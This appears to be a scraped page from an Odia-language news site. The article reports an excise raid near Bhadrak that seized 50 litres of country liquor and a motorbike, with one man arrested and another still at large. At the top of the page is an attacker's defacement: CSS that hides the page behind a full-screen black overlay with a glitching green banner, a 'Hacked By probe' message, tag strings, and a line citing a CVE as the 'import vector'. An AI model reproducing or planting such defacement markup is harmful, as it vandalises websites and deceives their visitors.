html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

ଭଦ୍ରକରେ ୫୦ ଲିଟର ଦେଶୀ ରନ୍ଧାମଦ ଜବତ ; ୧ ଗିରଫ 

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

ଭଦ୍ରକ,(ସତ୍ୟଭୂଷଣ ସ୍ଵାମୀ): ଜିଲ୍ଲା ଅବକାରୀ ବିଭାଗ ପକ୍ଷରୁ ଅବକାରୀ ନିରୀକ୍ଷକ ଶ୍ରୀ କ୍ଷୀତିସ ଦାସ ଏବଂ ଭଦ୍ରକ ଭାମ୍ୟମାଣ ସ୍କ୍ୱାଡ ଭାରପ୍ରାପ୍ତ ଅଧିକାରୀ ଶ୍ରୀ ବ୍ରଜମୋହନ ମଲିକ ଓ ଷ୍ଟାଫମାନଙ୍କୁ ନେଇ ଗଠିତ ଏକ ସ୍ୱତନ୍ତ୍ର ଟିମ ଦ୍ୱାରା ଭଦ୍ରକ ଗ୍ରାମାଞ୍ଚଳ ଥାନା ଅନ୍ତର୍ଗତ ଯୋରଗଡିଆ,କଙ୍କରା ଗ୍ରାମ ଅଞ୍ଚଳରେ ଚଢାଉ କରାଯାଇ ମୋଟ ୫୦ ଲିଟର ଦେଶୀ ରନ୍ଧା ମଦ ଓ ୧ ବାଇକ୍ ଜବତ କରିବା ସହିତ ଏଥିରେ ସଂପୃକ୍ତ ଜଣକୁ ଗିରଫ କରାଯାଇଛି । ଘଟଣାସ୍ଥଳରେ ଜଣେ ଆସାମୀ ଫେରାର ହୋଇ ଯାଇଥିବା ସୂଚନା। ଗିରଫ ହୋଇଥିବା ବ୍ୟକ୍ତିର ନାମ ମହେଶ୍ୱର ବେହେରା ଓ ଫେରାର ହୋଇ ଯାଇଥିବା ଆସାମୀ ବାବୁଲି ଦେଉରିକୁ ଖୋଜୁଛି ପୁଲିସ । ଏହି ଘଟଣାରେ ଏକ ମାମଲା ରୁଜୁ କରାଯାଇ ଅସମୀକୁ କୋର୍ଟ ଚାଲାଣ କରାଯାଇଛି।

0
0
0
s2sdefault